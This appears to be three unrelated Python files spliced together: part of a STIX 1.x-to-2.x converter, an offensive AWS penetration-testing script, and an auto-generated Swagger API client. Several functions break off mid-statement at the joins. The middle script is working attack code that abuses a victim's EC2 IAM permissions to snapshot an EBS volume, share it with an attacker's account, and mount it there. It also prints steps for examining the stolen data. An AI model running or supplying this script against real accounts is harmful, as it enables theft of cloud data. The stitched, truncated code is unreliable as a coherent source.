return_obj.append(marking_definition_instance)
else:
if get_option_value("spec_version") == "2.1":
warn("ACS data markings only supported when --acs option is used. See %s", 436, isa_marking.identifier)
else:
warn("ACS data markings cannot be supported in version 2.0.", 217)
return return_obj, isa_marking
def get_marking_specifications(stix1_object):
container = get_option_value("marking_container")
return container.get_markings(stix1_object)
def get_object_marking_refs(stix1_marking_specifications):
object_marking_refs = []
for marking_specification in stix1_marking_specifications or []:
for marking_structure in marking_specification.marking_structures:
stix2x_marking = map_1x_markings_to_2x(marking_structure)
if isinstance(stix2x_marking, dict):
object_marking_refs.append(stix2x_marking["id"])
else:
object_marking_refs.append(stix2x_marking)
return object_marking_refs
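# returns the de-duplicated union of the 2.x marking refs of several 1.x objects; used when a
# single 2.x object (e.g. a relationship) is derived from more than one 1.x object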
def create_marking_union(*stix1_objects):
union_object_marking_refs = []
for stix1_object in stix1_objects:
stix2_marking_refs = get_object_marking_refs(get_marking_specifications(stix1_object))
union_object_marking_refs.extend(stix2_marking_refs)
return list(set(union_object_marking_refs))
def finish_markings(instance, env, marking_specifications, temp_marking_id=None):
object_marking_refs = []
isa_marking = None
isa_marking_assertions = []
for marking_specification in marking_specifications:
for marking_structure in marking_specification.marking_structures:
if not check_map_1x_markings_to_2x(marking_structure):
stix2x_markings, ignore = convert_marking_specification(marking_specification,
env,
instance["id"],
isa_marking,
isa_marking_assertions)
for m in stix2x_markings:
if m["definition_type"] == "ais":
apply_ais_markings(instance, m)
object_marking_refs.append(m["marking_ref"])
elif instance["id"] != m["id"] and m["id"] not in object_marking_refs:
object_marking_refs.append(m["id"])
env.bundle_instance["objects"].append(m)
else:
env.bundle_instance["objects"].append(m)
else:
stix2x_marking = map_1x_markings_to_2x(marking_structure)
if (instance["id"] != stix2x_marking["id"] and
stix2x_marking["id"] not in object_marking_refs):
if "definition_type" in stix2x_marking and stix2x_marking["definition_type"] == "ais":
apply_ais_markings(instance, stix2x_marking)
object_marking_refs.append(stix2x_marking["marking_ref"])
else:
object_marking_refs.append(stix2x_marking["id"])
elif temp_marking_id:
object_marking_refs.append(temp_marking_id)
if env.created_by_ref and instance["id"] != env.created_by_ref:
instance["created_by_ref"] = env.created_by_ref
if object_marking_refs:
instance["object_marking_refs"] = object_marking_refs
def finish_basic_object(old_id, instance, env, stix1x_obj, temp_marking_id=None):
if old_id is not None:
record_ids(old_id, instance["id"])
if hasattr(stix1x_obj, "related_packages") and stix1x_obj.related_packages is not None:
for p in stix1x_obj.related_packages:
warn("Related_Packages type in %s not supported in STIX 2.x", 402, stix1x_obj.id_)
# Attach markings to SDO if present.
marking_specifications = get_marking_specifications(stix1x_obj)
finish_markings(instance, env, marking_specifications, temp_marking_id=temp_marking_id)
# Sightings
def handle_sightings_observables(related_observables, env):
refs = []
for ref in related_observables:
if ref.item.idref is None:
# embedded
new20s = handle_embedded_object(ref.item, env)
for new20 in new20s:
refs.append(new20["id"])
else:
refs.append(ref.item.idref)
return refs
def process_information_source_for_sighting(sighting, sighting_instance, env):
if sighting.source:
information_source = sighting.source
if information_source.identity is not None:
sighting_instance["where_sighted_refs"] = [get_identity_ref(information_source.identity, env, created_by_ref_source="this_identity")]
if information_source.description:
process_description_and_short_description(sighting_instance, sighting)
if information_source.references:
for ref in information_source.references:
sighting_instance["external_references"].append({"url": ref})
if information_source.roles:
handle_missing_string_property(sighting_instance, "information_source_roles", information_source.roles,
True, is_literal=True)
if information_source.tools:
for tool in information_source.tools:
handle_missing_tool_property(sighting_instance, tool)
def handle_sighting(sighting, sighted_object_id, env):
sighting_instance = create_basic_object("sighting", sighting, env)
sighting_instance["count"] = 1
sighting_instance["created_by_ref"] = env.created_by_ref
sighting_instance["sighting_of_ref"] = sighted_object_id
process_description_and_short_description(sighting_instance, sighting)
if sighting.related_observables:
sighting_instance["observed_data_refs"] = handle_sightings_observables(sighting.related_observables, env)
if sighting.source:
process_information_source_for_sighting(sighting, sighting_instance, env)
# assumption is that the observation is a single observation, not a summary of observations
sighting_instance["summary"] = False
finish_basic_object(None, sighting_instance, env, sighting)
return sighting_instance
# Relationships
def finish_markings_for_relationship(instance, marking_refs, temp_marking_id=None):
object_marking_refs = []
for marking_ref in marking_refs:
stix2x_marking = lookup_marking_reference(marking_ref)
if stix2x_marking:
if (instance["id"] != stix2x_marking["id"] and
stix2x_marking["id"] not in object_marking_refs):
if "definition_type" in stix2x_marking and stix2x_marking["definition_type"] == "ais":
apply_ais_markings(instance, stix2x_marking)
object_marking_refs.append(stix2x_marking["marking_ref"])
else:
object_marking_refs.append(stix2x_marking["id"])
elif temp_marking_id:
object_marking_refs.append(temp_marking_id)
else:
object_marking_refs.append(marking_ref)
if object_marking_refs:
instance["object_marking_refs"] = object_marking_refs
def create_relationship(source_ref, target_ref, env, verb, rel_obj=None, marking_refs=None):
relationship_instance = create_basic_object("relationship", rel_obj, env)
relationship_instance["source_ref"] = source_ref
relationship_instance["target_ref"] = target_ref
relationship_instance["relationship_type"] = verb
if env.created_by_ref:
relationship_instance["created_by_ref"] = env.created_by_ref
if rel_obj is not None and hasattr(rel_obj, "relationship") and rel_obj.relationship is not None:
relationship_instance["description"] = rel_obj.relationship.value
if marking_refs:
finish_markings_for_relationship(relationship_instance, marking_refs)
# double check in finalize_bundle
add_unfinished_marked_object(relationship_instance)
return relationship_instance
# Creating and Linking up relationships (three cases)
# 1. The object is embedded - create the object, add it to the bundle, return the id so the relationship is complete
# 2. an idref is given, and it has a corresponding 2.0 id, use it
# 3. an idref is given, but it has NO corresponding 2.0 id, add 1.x id, and fix at the end in fix_relationships
def handle_relationship_to_objs(items, source_id, env, verb, marking_refs):
for item in items:
new_stix2_instances = handle_embedded_object(item, env)
for new_2x in new_stix2_instances:
env.bundle_instance["relationships"].append(
create_relationship(source_id, new_2x["id"] if new_2x else None, env, verb, item, marking_refs)
)
def handle_embedded_ref(stix1_relationship, item, ref1, env, default_verb, to_direction, marking_refs):
new_stix2_instances = handle_embedded_object(item, env)
for new_2x in new_stix2_instances:
if to_direction:
source_id = ref1
target_id = new_2x["id"] if new_2x else None
else:
source_id = new_2x["id"] if new_2x else None
target_id = ref1
env.bundle_instance["relationships"].append(
create_relationship(source_id, target_id, env,
determine_appropriate_verb(default_verb, target_id),
stix1_relationship,
marking_refs)
)
def handle_existing_ref(stix1_relationship, ref1, ref2, env, default_verb, to_direction, marking_refs):
source_id = ref2 if to_direction else ref1
target_id = ref1 if to_direction else ref2
env.bundle_instance["relationships"].append(
create_relationship(source_id, target_id, env, default_verb, stix1_relationship, marking_refs=marking_refs)
)
def handle_existing_refs(ref, id, env, verb, to_direction, marking_refs):
for ref_id in get_id_value(ref.item.idref):
handle_existing_ref(ref, ref_id, id, env, verb, to_direction, marking_refs)
def handle_relationship_ref(ref, item, id, env, default_verb, to_direction=True, marking_refs=None):
if item.idref is None:
handle_embedded_ref(ref, item, id, env, default_verb, to_direction, marking_refs)
elif exists_id_key(item.idref):
handle_existing_refs(ref, id, env, default_verb, to_direction, marking_refs)
else:
# a forward reference, fix later
source_id = id if to_direction else item.idref
target_id = str(item.idref) if to_direction else id
rel_obj = create_relationship(source_id, target_id, env, default_verb, item, marking_refs)
if hasattr(ref, "relationship") and ref.relationship is not None:
rel_obj["description"] = ref.relationship.value
env.bundle_instance["relationships"].append(rel_obj)
def handle_relationship_to_refs(refs, source_id, env, default_verb, marking_refs=None):
for ref in refs:
if hasattr(ref, "item"):
item = ref.item
elif hasattr(ref, "course_of_action"):
item = ref.course_of_action
refs_markings = list(set(create_marking_union(item) + (marking_refs or [])))
handle_relationship_ref(ref, item, source_id, env, default_verb, to_direction=True, marking_refs=refs_markings)
def handle_relationship_from_refs(refs, target_id, env, default_verb, marking_refs=None):
for ref in refs:
if hasattr(ref, "item"):
item = ref.item
elif hasattr(ref, "course_of_action"):
item = ref.course_of_action
refs_markings = list(set(create_marking_union(item) + (marking_refs or [])))
handle_relationship_ref(ref, item, target_id, env, default_verb, to_direction=False, marking_refs=refs_markings)
def handle_observable_information_list_as_pattern(obs_list):
return convert_observable_list_to_pattern(obs_list)
def handle_observable_information_list(obs_list, source_id, env, verb, marking_refs):
for o in obs_list:
obs_markings = list(set(create_marking_union(o) + marking_refs))
if o.idref is None and o.object_ and not o.object_.idref:
# embedded, so generate scos too
new_od = convert_observed_data(o, env)
add_id_of_obs_in_characterizations(new_od["id"])
for obj_ref in new_od["object_refs"]:
env.bundle_instance["relationships"].append(
create_relationship(source_id, obj_ref, env, verb, marking_refs=obs_markings)
)
else:
if o.idref:
idref = o.idref
elif o.idref is None and o.object_ and o.object_.idref:
idref = generate_stix2x_id("observed-data", o.object_.idref)
obs_markings = list(set(create_marking_union(o.object_) + marking_refs))
if id_in_observed_data_mappings(idref):
obs2x = get_observed_data_from_mapping(idref)
add_id_of_obs_in_characterizations(obs2x["id"])
for ref in obs2x["object_refs"]:
env.bundle_instance["relationships"].append(
create_relationship(source_id, ref, env, verb, marking_refs=obs_markings)
)
else:
if id_in_observable_mappings(idref):
# handling a reference, scos generated later
new_od = convert_observed_data(get_obs_from_mapping(idref), env, keep_scos=False)
add_id_of_obs_in_characterizations(new_od["id"])
env.bundle_instance["objects"].append(new_od)
for ref in new_od["object_refs"]:
env.bundle_instance["relationships"].append(
create_relationship(source_id, ref, env, verb, marking_refs=obs_markings)
)
else:
# a forward reference, fix later
env.bundle_instance["relationships"].append(
create_relationship(source_id, idref, env, verb, marking_refs=obs_markings)
)
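# STIX 2.x ids always contain "--" (type--uuid), so a reference without "--" is still an
# unconverted 1.x id and needs fixing in fix_relationships below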
def reference_needs_fixing(ref):
return ref and ref.find("--") == -1
# this is very simplistic - because STIX 1.x verbs are not consistent.
def determine_appropriate_verb(current_verb, m_id):
if m_id is not None and current_verb == "uses":
type_and_uuid = m_id.split("--")
if type_and_uuid[0] == "identity":
return u"targets"
return current_verb
# for ids in source and target refs that are still 1.x ids, map them to their 2.x equivalents (creating new ids where necessary)
def fix_relationships(env):
extra_relationships = []
bundle_instance = env.bundle_instance
for ref in bundle_instance["relationships"]:
if is_stix1x_id(ref["source_ref"]):
if not exists_id_key(ref["source_ref"]):
new_id = generate_stix2x_id(None, str.lower(ref["source_ref"]))
if new_id is None:
error("Dangling source reference %s in %s", 601, ref["source_ref"], ref["id"])
add_id_value(ref["source_ref"], new_id)
mapped_ids = get_id_value(ref["source_ref"])
if mapped_ids[0] is None:
error("Dangling source reference %s in %s", 601, ref["source_ref"], ref["id"])
first_one = True
for m_id in mapped_ids:
if first_one:
ref["source_ref"] = m_id
first_one = False
else:
extra_relationships.append(
create_relationship(m_id, ref["target_ref"], env, ref["relationship_type"], marking_refs=ref.get("object_marking_refs", []))
)
if is_stix1x_id(ref["target_ref"]):
if not exists_id_key(ref["target_ref"]):
# create one, and add it
new_id = generate_stix2x_id(None, ref["target_ref"].lower())
if new_id is None:
error("Dangling target reference %s in %s", 602, ref["target_ref"], ref["id"])
add_id_value(ref["target_ref"], new_id)
mapped_ids = get_id_value(ref["target_ref"])
if mapped_ids[0] is None:
error("Dangling target reference %s in %s", 602, ref["target_ref"], ref["id"])
first_one = True
for m_id in mapped_ids:
verb = determine_appropriate_verb(ref["relationship_type"], m_id)
if first_one:
ref["target_ref"] = m_id
ref["relationship_type"] = verb
first_one = False
else:
extra_relationships.append(
create_relationship(ref["source_ref"], m_id, env, verb, marking_refs=ref.get("object_marking_refs", []))
)
bundle_instance["relationships"].extend(extra_relationships)
def fix_markings():
for stix2_instance in get_unfinished_marked_objects():
object_marking_refs = []
for marking_ref in stix2_instance.get("object_marking_refs", []):
if isinstance(marking_ref, MarkingStructure):
stix2x_marking = map_1x_markings_to_2x(marking_ref)
if marking_ref != stix2x_marking:
if "definition_type" in stix2x_marking and stix2x_marking["definition_type"] == "ais":
apply_ais_markings(stix2_instance, stix2x_marking)
object_marking_refs.append(stix2x_marking["marking_ref"])
else:
object_marking_refs.append(stix2x_marking["id"])
else:
object_marking_refs.append(marking_ref)
stix2_instance["object_marking_refs"] = object_marking_refs
# Relationships are not in 1.x, so they must be added explicitly to reports.
# This is done after the package has been processed, and the relationships are "fixed", so all relationships are known
#
# For each report:
# For each relationship
# if the source and target are part of the report, add the relationship
# if the source is part of the report, add the relationship AND then the target,
# UNLESS the target ref is "dangling"
# if the target is part of the report, add the relationship AND then the source,
# UNLESS the source ref is "dangling"
def add_relationships_to_reports(bundle_instance):
rels_to_include = []
new_ids = get_id_values()
for rep in bundle_instance["reports"]:
refs_in_this_report = rep["object_refs"]
for rel in bundle_instance["relationships"]:
if (("source_ref" in rel and rel["source_ref"] in refs_in_this_report) and
("target_ref" in rel and rel["target_ref"] in refs_in_this_report)):
# Source repository: mgeeky/Penetration-Testing-Tools
# File: clouds/aws/exfiltrate-ec2.py
#!/usr/bin/python3
#
# This script abuses insecure permissions given to the EC2 IAM Role to exfiltrate target EC2's
# filesystem data in a form of it's shared EBS snapshot or publicly exposed AMI image.
#
# CreateSnapshot:
# Abuses:
# ec2:CreateSnapshot
# ec2:ModifySnapshotAttribute
#
# The script will firstly create an EBS volume snapshot of the provided volume id. Then it will
# modify that snapshot's attributes to make it available for the foreign AWS Account that's going to
# be the Attacker's account. Then, the attacker will be able to create an EBS volume out of that snapshot.
# After doing so, the script will stop the EC2 instance specified by the Attacker in order to attach the
# previously created volume to it later on. Afterwards, the instance will be restarted and the attacker will be able
# to mount freshly attached volume in the operating system to further examine its contents.
#
# This technique is safe to be demonstrated during AWS Penetration tests.
#
#
# CreateImage:
# Abuses:
# ec2:CreateImage
# ec2:ModifyImageAttribute
#
# NOT FULLY IMPLEMENTED YET.
# For this technique, the procedure is as follows: the script will create an image out of the specified victim's EC2
# instance. This image will become publicly available (caution with client sensitive data!). After that, the script
# will attempt to create/import public SSH RSA keys to the attacker's account and then create an EC2 instance using that
# publicly available just created AMI image. Ultimately, the attacker will be able to SSH into newly created box to
# further examine it's filesystem contents.
#
# WARNING: Since this method creates a publicly available AMI image that will contain customer sensitive data, it is
# not recommended to use it during legal AWS Penetration Tests
#
# Author: <NAME>. / mgeeky, '19, <<EMAIL>>
#
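# For reference, a minimal victim-side IAM policy that already enables the CreateSnapshot path
# described above would look roughly like the following (illustrative sketch only, not taken from
# this repository; the optional cleanup step additionally calls ec2:DeleteSnapshot):
#
#   {
#     "Version": "2012-10-17",
#     "Statement": [{
#       "Effect": "Allow",
#       "Action": ["ec2:CreateSnapshot", "ec2:ModifySnapshotAttribute"],
#       "Resource": "*"
#     }]
#   }
#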
import sys
import pyjq
import json
import time
import boto3
import argparse
from botocore.exceptions import ClientError
config = {
'verbose' : False,
'region' : '',
'victim' : {
'profile' : '',
'access-key' : '',
'secret-key' : '',
'token' : '',
},
'attacker' : {
'profile' : '',
'access-key' : '',
'secret-key' : '',
'token' : '',
},
'method' : '',
'volume-id': '',
'instance-id': '',
'attach-instance-id': '',
}
class Logger:
@staticmethod
def _out(x):
sys.stdout.write(x + '\n')
@staticmethod
def out(x):
Logger._out('[>] ' + x)
@staticmethod
def info(x):
if config['verbose']:
Logger._out('[.] ' + x)
@staticmethod
def fatal(x):
sys.stdout.write('[!] ' + x + '\n')
sys.exit(1)
@staticmethod
def fail(x):
Logger._out('[-] ' + x)
@staticmethod
def ok(x):
Logger._out('[+] ' + x)
class ExfiltrateEC2:
session = None
def __init__(self, region, attacker_keys, victim_keys):
self.region = region
self.keys = {
'attacker' : {},
'victim' : {},
}
self.keys['attacker'] = attacker_keys
self.keys['victim'] = victim_keys
self.session = {
'attacker' : None,
'victim' : None,
}
Logger.info(f"Using region: {region}")
Logger.info("Authenticating using Attacker's AWS credentials...")
self.session['attacker'] = self.authenticate(region, attacker_keys)
Logger.info("Authenticating using Victim's AWS credentials...")
self.session['victim'] = self.authenticate(region, victim_keys)
def authenticate(self, region, keys):
session = None
try:
if keys['profile']:
session = boto3.Session(
profile_name = keys['profile'],
region_name = region
)
else:
session = boto3.Session(
aws_access_key_id = keys['access-key'],
aws_secret_access_key = keys['secret-key'],
aws_session_token = keys['token'],
region_name = region
)
except Exception as e:
Logger.fail(f'Could not authenticate to AWS: {e}')
raise e
return session
def get_session(self, whose):
return self.session[whose]
def get_account_id(self, whose):
try:
return self.session[whose].client('sts').get_caller_identity()['Account']
except Exception as e:
Logger.fatal(f'Could not Get Caller\'s identity: {e}')
def create_snapshot(self, attacker_instance_id, volume_id, availability_zone):
victim_client = self.session['victim'].client('ec2')
attacker_client = self.session['attacker'].client('ec2')
target_user = self.get_account_id('attacker')
snapshot = None
volume_created = None
modify_result = None
Logger.out(f"Step 1: Creating EBS volume snapshot. VolumeId = {volume_id}")
try:
snapshot = victim_client.create_snapshot(
Description = f'Exfiltrated EBS snapshot of volume: {volume_id}',
VolumeId = volume_id
)
Logger.ok(f"Snapshot of volume {volume_id} created: {snapshot['SnapshotId']}")
except Exception as e:
Logger.fatal(f"ec2:CreateSnapshot action on Victim failed. Exception: {e}")
Logger.out(f"Step 2: Modifying snapshot attributes to share it with UserId = {target_user}")
try:
modify_result = victim_client.modify_snapshot_attribute(
Attribute = f'createVolumePermission',
OperationType = 'add',
SnapshotId = snapshot['SnapshotId'],
UserIds = [
target_user,
]
)
Logger.ok(f"Snapshot's attributes modified to share it with user {target_user}")
except Exception as e:
Logger.fatal(f"ec2:ModifySnapshotAttribute action on Victim failed. Exception: {e}")
Logger.out(f"Step 3: Waiting for the snapshot to transit into completed state.")
try:
victim_client.get_waiter('snapshot_completed').wait(SnapshotIds=[snapshot['SnapshotId']])
except Exception as e:
Logger.fail(f"boto3 Waiter for snapshot completed state failed. Exception: {e}")
Logger.info("Waiting in a traditional manner: 3 minutes.")
time.sleep(3 * 60)
Logger.out(f"Step 4: Creating EBS volume in Attacker's {target_user} AWS account.")
attacker_instance_data = None
try:
if not availability_zone:
availability_zone = self.region + 'a'
attacker_instance = attacker_client.describe_instances(
InstanceIds = [attacker_instance_id, ]
)
for inst in attacker_instance['Reservations'][0]['Instances']:
if inst['InstanceId'] == attacker_instance_id:
availability_zone = inst['Placement']['AvailabilityZone']
attacker_instance_data = inst
Logger.info(f"Obtained Attacker's EC2 instance Availbility Zone automatically: {availability_zone}")
break
except Exception as e:
Logger.fail(f"THIS MAY BE FATAL: Could not enumerate attacker's instance with given InstanceId = {attacker_instance_id}")
Logger.fail(f"Exception: {e}")
raise e
# note: this fallback assignment is unreachable because of the raise above
availability_zone = self.region + 'a'
try:
volume_created = attacker_client.create_volume(
AvailabilityZone = availability_zone,
Encrypted = False,
VolumeType = 'gp2',
SnapshotId = snapshot['SnapshotId']
)
Logger.ok(f"Created EBS volume ({volume_created['VolumeId']} at Attacker's side out from exfiltrated snapshot ({snapshot['SnapshotId']})")
except Exception as e:
Logger.fail(f"ec2:CreateVolume action on Attacker failed. Exception: {e}")
Logger.out(f"Step 5: Waiting for the volume to transit into created state.")
try:
attacker_client.get_waiter('volume_available').wait(VolumeIds=[volume_created['VolumeId']])
except Exception as e:
Logger.fail(f"boto3 Waiter for volume available failed. Exception: {e}")
Logger.info("Waiting in a traditional manner: 3 minutes.")
time.sleep(3 * 60)
Logger.out(f"Step 6: Attaching created EBS volume to Attacker's specified EC2 instance")
try:
attacker_client.attach_volume(
Device = '/dev/xvdf',
InstanceId = attacker_instance_id,
VolumeId = volume_created['VolumeId']
)
Logger.ok(f"Attached volume to the specified Attacker's EC2 instance: {attacker_instance_id}")
except Exception as e:
if 'IncorrectInstanceState' in str(e):
Logger.fail("Attacker's machine is in running state, preventing to attach it a volume.")
Logger.info("Trying to stop the EC2 instance, then attach the volume and then restart it.")
try:
attacker_instance = attacker_client.stop_instances(
InstanceIds = [attacker_instance_id, ]
)
attacker_client.get_waiter('instance_stopped').wait(InstanceIds = [attacker_instance_id, ])
attacker_client.attach_volume(
Device = '/dev/xvdf',
InstanceId = attacker_instance_id,
VolumeId = volume_created['VolumeId']
)
Logger.ok(f"Attached volume to the specified Attacker's EC2 instance: {attacker_instance_id}")
except Exception as e:
Logger.fail(f"ec2:AttachVolume action on Attacker failed. Exception: {e}")
Logger.fail("Tried to automatically stop attacker's EC2 instance, then attach volume and restart it, but that failed as well.")
Logger.fail(f"Exception: " + str(e))
Logger.info("Restarting it...")
attacker_instance = attacker_client.start_instances(
InstanceIds = [attacker_instance_id, ]
)
attacker_client.get_waiter('instance_running').wait(InstanceIds = [attacker_instance_id, ])
try:
attacker_instance = attacker_client.describe_instances(
InstanceIds = [attacker_instance_id, ]
)
for inst in attacker_instance['Reservations'][0]['Instances']:
if inst['InstanceId'] == attacker_instance_id:
attacker_instance_data = inst
break
except: pass
else:
Logger.fail(f"ec2:AttachVolume action on Attacker failed. Exception: {e}")
try:
Logger.out(f"Cleanup. Trying to remove created snapshot ({snapshot['SnapshotId']}) at Victim's estate...")
victim_client.delete_snapshot(SnapshotId = snapshot['SnapshotId'])
Logger.ok(f"Snapshot removed.")
except Exception as e:
Logger.fail(f"(That's ok) ec2:DeleteSnapshot action on Victim failed. Exception: {e}")
ssh_command = 'SSH to the attacker\'s EC2 instance\n'
if attacker_instance_data:
try:
ip = attacker_instance_data['PublicIpAddress']
except:
Logger.fail(f"Could not obtain Attacker's EC2 Public ip address. Available fields:\n {attacker_instance_data}\n")
ip = "ec2-ip-address"
if ip:
ssh_command = f'''SSH to the attacker's EC2 instance
# ssh ec2-user@{ip}
'''
print(f'''
===============================================================
[MODULE FINISHED]
===============================================================
[+] Exfiltrated snapshot of a victim's EBS volume:
VictimVolumeId = {volume_id}
[+] By creating a snapshot of it, shared to the attacker's AWS user ID.
SnapshotId = {snapshot['SnapshotId']}
If everything went fine, Attacker's AWS account {target_user} should have a EBS volume now:
AttackerVolumeId = {volume_created['VolumeId']}
That was attached to the specified attacker's EC2 instance:
AttackerInstanceId = {attacker_instance_id}
AvailibityZone = {availability_zone}
Most likely as a '/dev/xvdf' device.
===============================================================
To examine exfiltrated data:
0) {ssh_command}
1) List block devices mapped:
# lsblk
2) If above listing yielded mapped block device, e.g. xvdf, create a directory for it:
# mkdir /exfiltrated
3) Mount that device's volume:
# mount /dev/xvdf1 /exfiltrated
4) Review it's contents:
# ls -l /exfiltrated
''')
return True
def create_image(self, instance_id, image_name, image_description):
victim_client = self.session['victim'].client('ec2')
attacker_client = self.session['attacker'].client('ec2')
created_image = None
try:
Logger.out("Step 1: Creating a publicly available AMI image out of specified EC2 instance.")
created_image = victim_client.create_image(
InstanceId = instance_id,
Name = image_name,
Description = image_description
)
Logger.ok(f"AMI Image with name: ({image_name}) created: {created_image['ImageId']}")
except Exception as e:
Logger.fatal(f"ec2:CreateImage action on Victim failed. Exception: {e}")
target_user = self.get_account_id('attacker')
Logger.out(f"Step 2: Modifying image attributes to share it with UserId = {target_user}")
try:
modify_result = victim_client.modify_image_attribute(
Attribute = 'launchPermission',
ImageId = created_image['ImageId'],
OperationType = 'add',
UserIds =
# coding: utf-8
"""
Layered Witness & Control
LI Witness provides deep insight and analytics into containerized applications. Control provides dynamic runtime security and analytics for containerized applications. You can find out more about the Layered Insight Suite at [http://layeredinsight.com](http://layeredinsight.com).
OpenAPI spec version: 0.9.7
Contact: <EMAIL>
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class ImageApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def add_image(self, **kwargs):
"""
Create new image definition
Creates an image object. ID SHOULD NOT be passed when creating a new image.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.add_image(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param Image image:
:param str instrument_image: Set to \"true\" to instrument image at time of API call
:return: Image
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.add_image_with_http_info(**kwargs)
else:
(data) = self.add_image_with_http_info(**kwargs)
return data
def add_image_with_http_info(self, **kwargs):
"""
Create new image definition
Creates an image object. ID SHOULD NOT be passed when creating a new image.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.add_image_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param Image image:
:param str instrument_image: Set to \"true\" to instrument image at time of API call
:return: Image
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['image', 'instrument_image']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_image" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'instrument_image' in params:
query_params.append(('InstrumentImage', params['instrument_image']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'image' in params:
body_params = params['image']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['ApiKey']
return self.api_client.call_api('/Images', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Image',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def assign_configuration_to_image(self, image_id, config_id, **kwargs):
"""
Assign configuration to image
Assigns the specified configuration to the specified image.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.assign_configuration_to_image(image_id, config_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str image_id: hexadecimal ID of image to instrument (required)
:param str config_id: hexadecimal ID of configuration to assign to image (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.assign_configuration_to_image_with_http_info(image_id, config_id, **kwargs)
else:
(data) = self.assign_configuration_to_image_with_http_info(image_id, config_id, **kwargs)
return data
def assign_configuration_to_image_with_http_info(self, image_id, config_id, **kwargs):
"""
Assign configuration to image
Assigns the specified configuration to the specified image.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.assign_configuration_to_image_with_http_info(image_id, config_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str image_id: hexadecimal ID of image to instrument (required)
:param str config_id: hexadecimal ID of configuration to assign to image (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['image_id', 'config_id']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method assign_configuration_to_image" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'image_id' is set
if ('image_id' not in params) or (params['image_id'] is None):
raise ValueError("Missing the required parameter `image_id` when calling `assign_configuration_to_image`")
# verify the required parameter 'config_id' is set
if ('config_id' not in params) or (params['config_id'] is None):
raise ValueError("Missing the required parameter `config_id` when calling `assign_configuration_to_image`")
collection_formats = {}
path_params = {}
if 'image_id' in params:
path_params['imageID'] = params['image_id']
if 'config_id' in params:
path_params['configID'] = params['config_id']
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['ApiKey']
return self.api_client.call_api('/Images/{imageID}/Configs/{configID}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def assign_policy_to_image(self, image_id, policy_id, **kwargs):
"""
Assign security policy to image
Assigns the specified security policy to the specified image. Running containers will update to the new policy within one minute.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.assign_policy_to_image(image_id, policy_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str image_id: hexadecimal ID of image to instrument (required)
:param str policy_id: hexadecimal ID of policy to assign to image (required)
:return: Image
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.assign_policy_to_image_with_http_info(image_id, policy_id, **kwargs)
else:
(data) = self.assign_policy_to_image_with_http_info(image_id, policy_id, **kwargs)
return data
def assign_policy_to_image_with_http_info(self, image_id, policy_id, **kwargs):
"""
Assign security policy to image
Assigns the specified security policy to the specified image. Running containers will update to the new policy within one minute.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.assign_policy_to_image_with_http_info(image_id, policy_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str image_id: hexadecimal ID of image to instrument (required)
:param str policy_id: hexadecimal ID of policy to assign to image (required)
:return: Image
If the method is called asynchronously,
